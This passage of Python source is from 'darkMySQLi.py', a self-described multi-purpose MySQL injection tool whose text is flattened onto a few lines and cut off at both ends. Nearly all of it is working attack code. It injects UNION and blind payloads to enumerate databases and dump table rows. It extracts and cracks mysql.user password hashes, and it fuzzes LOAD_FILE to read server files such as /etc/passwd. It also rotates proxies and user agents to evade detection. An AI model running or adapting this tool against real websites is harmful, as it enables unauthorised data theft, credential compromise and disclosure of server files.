Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!" 
print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" break except: print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" raise return source #the guts and glory - Binary Algorithim that does all the guessing for the Blind Methodology def GuessValue(URL): lower = lower_bound;upper = upper_bound while lower < upper: try: mid = (lower + upper) / 2 head_URL = URL + ">"+str(mid) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: lower = mid + 1 else: upper = mid except (KeyboardInterrupt, SystemExit): raise except: pass if lower > lower_bound and lower < upper_bound: value = lower else: head_URL = URL + "="+str(lower) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: value = lower else: value = 63 print "Could not find the ascii character! There must be a problem.." print "Check to make sure your using the my script right!" 
print "READ xprog's blind sql tutorial!\n" sys.exit(1) return value ## Functions for MySQL5 hash cracking --- THANKS d3hydr8 def c1(word): s = hashlib.sha1() s.update(word[:-1]) s2 = hashlib.sha1() s2.update(s.digest()) return s2.hexdigest() def c2(word): s = sha.new() s.update(word[:-1]) s2 = sha.new() s2.update(s.digest()) return s2.hexdigest() ## Funtion for MySQL323 hash cracking def mysql323(clear): # Taken almost verbatim from mysql's source nr = 1345345333 add = 7 nr2 = 0x12345671 retval = "" for c in clear: if c == ' ' or c == '\t': continue tmp = ord(c) nr ^= (((nr & 63) + add) * tmp) + (nr << 8) nr2 += (nr2 << 8) ^ nr add += tmp res1 = nr & ((1 << 31) - 1) res2 = nr2 & ((1 << 31) - 1) return "%08lx%08lx" % (res1, res2) #say hello if len(sys.argv) <= 1: print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" sys.exit(1) #help option for arg in sys.argv: if arg == "-h" or arg == "--help": print "\n darkMySQLi v1.6 rsauron@gmail.com" print " forum.darkc0de.com" print "Usage: ./darkMySQLi.py [options]" print "Options:" print " -h, --help shows this help message and exits" print " -d, --debug display URL debug information\n" print " Target:" print " -u URL, --url=URL Target url\n" print " Methodology:" print " -b, --blind Use blind methodology (req: --string)" print " -s, --string String to match in page when the query is valid" print " Method:" print " --method=PUT Select to use PUT method ** NOT WORKING" print " Modes:" print " --dbs Enumerate databases MySQL v5+" print " --schema Enumerate Information_schema (req: -D," print " opt: -T) MySQL v5+" print " --full Enumerate all we can MySQL v5+" print " --info MySQL Server configuration MySQL v4+" print " --fuzz Fuzz Tables & Columns Names MySQL 
v4+" print " --findcol Find Column length MySQL v4+" print " --dump Dump database table entries (req: -T," print " opt: -D, -C, --start) MySQL v4+" print " --crack=HASH Crack MySQL Hashs (req: --wordlist)" print " --wordlist=LIS.TXT Wordlist to be used for cracking" print " Define:" print " -D DB database to enumerate" print " -T TBL database table to enumerate" print " -C COL database table column to enumerate" print " Optional:" print " --ssl To use SSL" print " --end To use + and -- for the URLS --end \"--\" (Default)" print " To use /**/ and /* for the URLS --end \"/*\"" print " --rowdisp Do not display row # when dumping" print " --start=ROW Row number to begin dumping at" print " --where=COL,VALUE Use a where clause in your dump" print " --orderby=COL Use a orderby clause in your dump" print " --cookie=FILE.TXT Use a Mozilla cookie file" print " --proxy=PROXY Use a HTTP proxy to connect to the target url" print " --output=FILE.TXT Output results of tool to this file\n" sys.exit(1) #define variables site = "" proxy = "None" arg_string = "" arg_blind = "--union" arg_table = "None" arg_database = "None" arg_columns = "None" arg_row = "Rows" arg_cookie = "None" arg_insert = "None" arg_where = "" arg_orderby = "" arg_debug = "off" arg_rowdisp = 1 arg_adminusers = 10 arg_wordlist = "" arg_ssl = "off" arg_proxy_auth = "" darkc0de = "concat(0x1e,0x1e," mode = "None" lower_bound = 0 upper_bound = 16069 line_URL = "" count_URL = "" cur_db = "" cur_table = "" terminal = "" count = 0 gets = 0 table_num = 0 num = 0 ser_ver = 3 version =[] let_pos = 1 lim_num = 0 agent = "" #Check args for arg in sys.argv: if arg == "-u" or arg == "--url": site = sys.argv[count+1] elif arg == "--output": logfile = sys.argv[count+1] elif arg == "--proxy": proxy = sys.argv[count+1] elif arg == "--proxyauth": arg_proxy_auth = sys.argv[count+1] elif arg == "--dump": mode = arg;arg_dump = sys.argv[count] elif arg == "--full": mode = arg elif arg == "--schema": mode = arg;arg_schema = 
sys.argv[count] elif arg == "--dbs": mode = arg;arg_dbs = sys.argv[count] elif arg == "--fuzz": mode = arg;arg_fuzz = sys.argv[count] elif arg == "--info": mode = arg;arg_info = sys.argv[count] elif arg == "--crack": mode = arg;arg_hash = sys.argv[count+1] elif arg == "--wordlist": arg_wordlist = sys.argv[count+1] elif arg == "--findcol": mode = arg;arg_findcol = sys.argv[count] elif arg == "--cookie": arg_cookie = sys.argv[count+1] elif arg == "--ssl": arg_ssl = "on" elif arg == "-b" or arg == "--blind": arg_blind = arg;arg_blind = sys.argv[count] elif arg == "-s" or arg == "--string": arg_string = sys.argv[count+1] elif arg == "-D": arg_database = sys.argv[count+1] elif arg == "-T": arg_table = sys.argv[count+1] elif arg == "-C": arg_columns = sys.argv[count+1] elif arg == "--start": num = int(sys.argv[count+1]) - 1 table_num = num elif arg == "-d" or arg == "--debug": arg_debug = "on" elif arg == "--where": arg_where = sys.argv[count+1] elif arg == "--orderby": arg_orderby = sys.argv[count+1] elif arg == "--rowdisp": arg_rowdisp = sys.argv[count] arg_rowdisp = 0 elif arg == "--end": arg_end = sys.argv[count+1] if arg_end == "--": arg_eva = "+" else: arg_eva = "/**/" count+=1 #Title write file = open(logfile, "a") print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" #Arg Error Checking if mode != "--crack" and site == "": print "[-] URL is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "None": print "[-] Mode is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--schema" and arg_database == "None": print "[-] Must include -D flag!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--dump": if arg_table == "None" or arg_columns == "None": print "[-] Must include -T and -C flag. 
-D is Optional\n[-] Need Help? --help\n" sys.exit(1) if proxy != "None": if len(proxy.split(".")) == 2: proxy = open(proxy, "r").read() if proxy.endswith("\n"): proxy = proxy.rstrip("\n") proxy = proxy.split("\n") if arg_ssl == "off": if site[:4] != "http": site = "http://"+site else: if site[:5] != "https": site = "https://"+site if site.endswith("/*"): site = site.rstrip('/*') if site.endswith("--"): site = site.rstrip('--') if arg_cookie != "None": try: cj = cookielib.MozillaCookieJar() cj.load(arg_cookie) cookie_handler = urllib2.HTTPCookieProcessor(cj) except: print "[!] There was a problem loading your cookie file!" print "[!] Make sure the cookie file is in Mozilla Cookie File Format!" print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n" sys.exit(1) else: cookie_handler = urllib2.HTTPCookieProcessor() if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("darkc0de") == -1: print "[-] Site must contain \'darkc0de\'\n" sys.exit(1) if arg_blind == "--blind" and arg_string == "": print "[-] You must specify a --string when using blind methodology.\n" sys.exit(1) if arg_columns != "None": arg_columns = arg_columns.split(",") if arg_insert != "None": arg_insert = arg_insert.split(",") if mode == "--crack" and arg_wordlist == "": print "[-] You must specify a --wordlist to crack with.\n" sys.exit(1) agent = random.choice(agents) file.write("\n|--------------------------------------------------|") file.write("\n| rsauron@gmail.com v1.6 |") file.write("\n| 1/2009 darkMySQLi.py |") file.write("\n| -- Multi Purpose MySQL Injection Tool -- |") file.write("\n| Usage: darkMySQLi.py [options] |") file.write("\n| -h help darkc0de.com |") file.write("\n|--------------------------------------------------|") ## MySQL Hash cracking if mode == "--crack": try: arg_wordlist = open(arg_wordlist, "r") except(IOError): print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n") 
sys.exit(1) if len(arg_hash) != 40 and len(arg_hash) != 16: print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n") sys.exit(1) arg_wordlist = arg_wordlist.readlines() print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist))) if len(arg_hash) == 40: print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash) try: import hashlib for word in arg_wordlist: if arg_hash == c1(word): print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word) break except(ImportError): import sha for word in arg_wordlist: if arg_hash == c2(word): print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word) break else: print "[+] Detected MySQL v4 Hash:",arg_hash print "[+] Try darkc0de hash database @ " for word in arg_wordlist: word = word.rstrip("\n") if arg_hash == mysql323(word): print "\n[!] Password is:",word+"\n";file.write("\n\n[!] Password is: "+word+"\n") break print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n") sys.exit(1) #General Info print "[+] URL:",site;file.write("\n\n[+] URL: "+site) print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X")) print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end) print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie) if site[:5] == "https": print "[+] SSL: Yes";file.write("\n[+] SSL: Yes") else: print "[+] SSL: No";file.write("\n[+] SSL: No") print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent) #Build proxy list proxy_list = [];proxy_list_count = [] if proxy != "None": print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...") for p in proxy: try: match = re.findall(":",p) if len(match) == 3: arg_proxy_auth = [] prox = p.split(":") arg_proxy_auth += prox if arg_proxy_auth != "": proxy_auth_handler = urllib2.HTTPBasicAuthHandler() 
proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3]) opener = urllib2.build_opener(proxy_auth_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler)) proxy_list_count.append(p);arg_proxy_auth = "" else: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'}) opener = urllib2.build_opener(proxy_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler)) proxy_list_count.append(p) if len(match) == 3 or len(match) == 1: print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success") else: print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success") except: print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0])) pass if len(proxy_list) == 0: print "[-] All proxies have failed. App Exiting" sys.exit(1) print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete") else: print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given") proxy_list.append(urllib2.build_opener(cookie_handler)) proxy_list_count.append("None") proxy_num = 0 proxy_len = len(proxy_list) ## Blind String checking! if arg_blind == "--blind": print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!") head_URL = site+"+AND+1=1" source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 2: print "\n[-] The String you used has been found on the target page in-use more than 2 times" print "[-] This might lead to false positives with the blind methodology" print "[-] Might not mean anything.. I am just trying to help out.." print "[-] If you have problems you might know why.. 
;-)\n" if len(match) == 0: print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n" sys.exit(1) if len(match) == 1: print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)") #Column Finder c0de if mode == "--findcol": print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...") print "[+] Testing: ", file.write("\n[+] Testing: ",) checkfor=[];nullFound=[];nullnum=[];makepretty = "" sitenew = site+"+AND+1=2+UNION+SELECT+" for x in xrange(1,colMax): try: sys.stdout.write("%s," % (x)) file.write(str(x)+",") sys.stdout.flush() darkc0de = "dark"+str(x)+"code" checkfor.append(darkc0de) if x > 1: sitenew += "," sitenew += "0x"+darkc0de.encode("hex") finalurl = sitenew+arg_end source = GetThatShit(finalurl) for y in checkfor: colFound = re.findall(y,source) if len(colFound) != 0: nullFound.append(colFound[0]) if len(nullFound) >= 1: print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor))) print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",) for z in nullFound: nullcol = re.findall(("\d+"),z) nullnum.append(nullcol[0]) sys.stdout.write("%s," % (nullcol[0])) file.write(str(nullcol[0])+",") sys.stdout.flush() for z in xrange(0,len(checkfor)): z+=1 if z > 1: makepretty += "," makepretty += str(z) site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site) for z in nullnum: site = site.replace("+"+z+",","+darkc0de,") site = site.replace(","+z+",",",darkc0de,") site = site.replace(","+z+arg_end,",darkc0de"+arg_end) print "[!] darkMySQLi URL:",site;file.write("\n[!] 
darkMySQLi URL: "+site) print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets)) print "[-] Done\n";file.write("\n[-] Done\n") print "Don't forget to check", logfile,"\n" file.close();sys.exit(1) except (KeyboardInterrupt, SystemExit): raise except: pass print "\n[!] Sorry Column Length could not be found." file.write("\n[!] Sorry Column Length could not be found.") print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!" print "[-] Done\n" sys.exit(1) #Retrieve version:user:database if arg_blind != "--blind": head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n") source = GetThatShit(head_URL) match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: match = match[0][0:].split("\x1e") version = match[2] user = match[3] database = match[4] print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n") print "\tUser:", user;file.write("\tUser: "+user+"\n") print "\tVersion:", version;file.write("\tVersion: "+version) else: print "\n[-] There seems to be a problem with your URL. 
Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n" sys.exit(1) else: print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...") while 1: config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver) source = GetThatShit(config_URL) match = re.findall(arg_string,source) if len(match) >= 1: print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!") version += str(ser_ver) break if ser_ver == 6: print "[-] Was unable to determine MySQL version.\n[-] Done" sys.exit(1) ser_ver+=1 #lets check what we can do based on version if mode == "--schema" or mode == "--dbs" or mode == "--full": if version[0] == str(4): print "\n[-] Mode Selected is incompatible with MySQL v4 Servers" print "[-] -h for help" sys.exit(1) # Mode --info if mode == "--info" and arg_blind != "--blind": head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+mysql.user"+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) >= 1: yesno = "YES <-- w00t w00t" else: yesno = "NO" print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) if yesno == "YES <-- w00t w00t": print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. 
host:user:password") head_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end source = GetThatShit(head_URL) match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0] print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend)) head_URL = site.replace("darkc0de","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)") head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end for x in range(0,int(userend)): try: source = GetThatShit(head_URL.replace("NUM",str(x))) match = re.findall("\x1e\x1e\S+",source) match = match[0].strip("\x1e").split("\x1e") if len(match) != 3: nullvar = "NULL" match += nullvar print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2])) except (KeyboardInterrupt, SystemExit): raise except: pass else: print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!" file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!") head_URL = site.replace("darkc0de","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) >= 1: yesno = "YES <-- w00t w00t" else: yesno = "NO" print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno)) if yesno == "YES <-- w00t w00t": fuzz_load = open(loadfilefuzz, "r").readlines() head_URL = site.replace("darkc0de","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) > 1: onoff = "OFF <-- w00t w00t" else: onoff = "ON" print "\n[+] Magic quotes are:",onoff yesno = str(raw_input("\n[!] 
Would You like to fuzz LOAD_FILE (Yes/No): ")) if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes": print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...") print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n") for sysfile in fuzz_load: sysfile = sysfile.rstrip("\n") if proxy != "None": sysfile = sysfile.replace("/","%2F") sysfile = sysfile.replace(".","%2E") if onoff == "OFF <-- w00t w00t": head_URL = site.replace("darkc0de","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end else: head_URL = site.replace("darkc0de","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) > 0: print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile) head_URL = head_URL.replace("concat(","") head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","") print "[!]",head_URL;file.write("\n[!] "+head_URL) else: print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!" 
file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!") #Fuzz table/columns if mode == "--fuzz": fuzz_tables = open(tablefuzz, "r").readlines() fuzz_columns = open(columnfuzz, "r").readlines() print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...") print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables))) print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns))) print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...") if arg_blind == "--blind": fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1" else: fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+TABLE"+arg_end for table in fuzz_tables: table = table.rstrip("\n") table_URL = fuzz_URL.replace("TABLE",table) source = GetThatShit(table_URL) if arg_blind == "--blind": match = re.findall(arg_string,source) else: match = re.findall("darkc0de", source); if len(match) > 0: print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table)) print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"") if arg_blind == "--blind": table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1" for column in fuzz_columns: column = column.rstrip("\n") if arg_blind == "--blind": column_URL = table_URL.replace("COLUMN",column) else: column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")") source = GetThatShit(column_URL) if arg_blind == "--blind": match = re.findall(arg_string,source) else: match = re.findall("darkc0de",source) if len(match) > 0: print "[!] Found a column called:",column;file.write("\n[!] 
Found a column called:"+column) print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!") #Build URLS for each different mode if mode == "--schema": if arg_database != "None" and arg_table == "None": if arg_blind == "--blind": print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"") count_URL = site+"+and+((SELECT+COUNT(table_name)" count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+table_name" line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex") else: print "[+] Showing Tables & Columns from database \""+arg_database+"\"" file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)") count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex") arg_row = "Tables" if arg_database != "None" and arg_table != "None": if arg_blind == "--blind": print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") count_URL = site+"+and+((SELECT+COUNT(column_name)" count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+column_name" line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") else: 
print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") arg_row = "Columns" elif mode == "--dump": print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"" file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"") print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns)) if arg_blind == "--blind": darkc0de = "" for column in arg_columns: darkc0de += column+",0x3a," darkc0de = darkc0de.rstrip("0x3a,") count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_database+"."+arg_table else: for column in arg_columns: darkc0de += column+",0x1e," count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table if arg_where != "" or arg_orderby != "": if arg_where != "": arg_where = arg_where.split(",") print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\"" arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex") if arg_orderby != "": arg_orderby = "ORDER+BY+'"+arg_orderby+"'" print "[+] ORDERBY clause:",arg_orderby count_URL += "+"+arg_where line_URL += "+"+arg_where+"+"+arg_orderby if version[0] == 4: 
count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_table elif mode == "--full": print "[+] Starting full SQLi information_schema enumeration..." line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex") elif mode == "--dbs": print "[+] Showing all databases current user has access too!" file.write("\n[+] Showing all databases current user has access too!") if arg_blind == "--blind": count_URL = site+"+and+((SELECT+COUNT(schema_name)" count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+schema_name" line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex") else: count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)") line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex") arg_row = "Databases" if arg_blind == "--blind": count_URL+="))" line_URL+="+LIMIT+" else: count_URL += arg_end line_URL += "+LIMIT+NUM,1"+arg_end ## Blind Info --- I know it doesnt make sence where this code is.. but.. fuck it... 
if mode == "--info" and arg_blind == "--blind": head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1" source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password" else: yesno = "NO" print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) print "\n[+] Showing database version, username@location, and database name!" file.write("\n\n[+] Showing database version, username@location, and database name!") line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database()))," row_value = 1 #Lets Count how many rows or columns if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full": if arg_blind == "--blind": row_value = GuessValue(count_URL) else: source = GetThatShit(count_URL) match = re.findall("\x1e\x1e\S+",source) match = match[0][2:].split("\x1e") row_value = match[0] print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n") ## UNION Schema Enumeration and DataExt loop if arg_blind == "--union": if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full": while int(table_num) != int(row_value): try: source = GetThatShit(line_URL.replace("NUM",str(num))) match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: if mode == "--schema" or mode == "--full": match = match[0][2:].split("\x1e") if cur_db != match[0]: cur_db = match[0] if table_num == 0: print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n") else: print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n") print "[Table: Columns]";file.write("[Table: Columns]\n") if cur_table != match[1]: print "\n["+str(table_num+1)+"]"+match[1]+": "+match[2], file.write("\n["+str(table_num+1)+"]"+match[1]+": "+match[2]) cur_table = match[1] #table_num+=1 table_num 
= int(table_num) + 1 else: sys.stdout.write(",%s" % (match[2])) file.write(","+match[2]) sys.stdout.flush() #Gathering Databases only elif mode == "--dbs": match = match[0] if table_num == 0: print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match)) else: print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match)) table_num+=1 #Collect data from tables & columns elif mode == "--dump": match = re.findall("\x1e\x1e+.+\x1e\x1e",source) if match == []: match = [''] else: match = match[0].strip("\x1e").split("\x1e") if arg_rowdisp == 1: print "\n["+str(num+1)+"] ",;file.write("\n["+str(num+1)+"] ",) else: print;file.write("\n") for ddata in match: if ddata == "": ddata = "NoDataInColumn" sys.stdout.write("%s:" % (ddata)) file.write("%s:" % ddata) sys.stdout.flush() table_num+=1 else: if mode == "--dump": table_num+=1 sys.stdout.write("\n[%s] No data" % (num)) file.write("\n[%s] No data" % (num)) break num+=1 except (KeyboardInterrupt, SystemExit): raise except: pass ## Blind Schema Enumeration and DataExt loop if arg_blind == "--blind": if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info": lower_bound = 0 upper_bound = 127 print for data_row in range(int(num), row_value): sys.stdout.write("[%s]: " % (lim_num)) file.write("\n[%s]: " % (lim_num)) sys.stdout.flush() value = chr(upper_bound) while value != chr(0): if mode 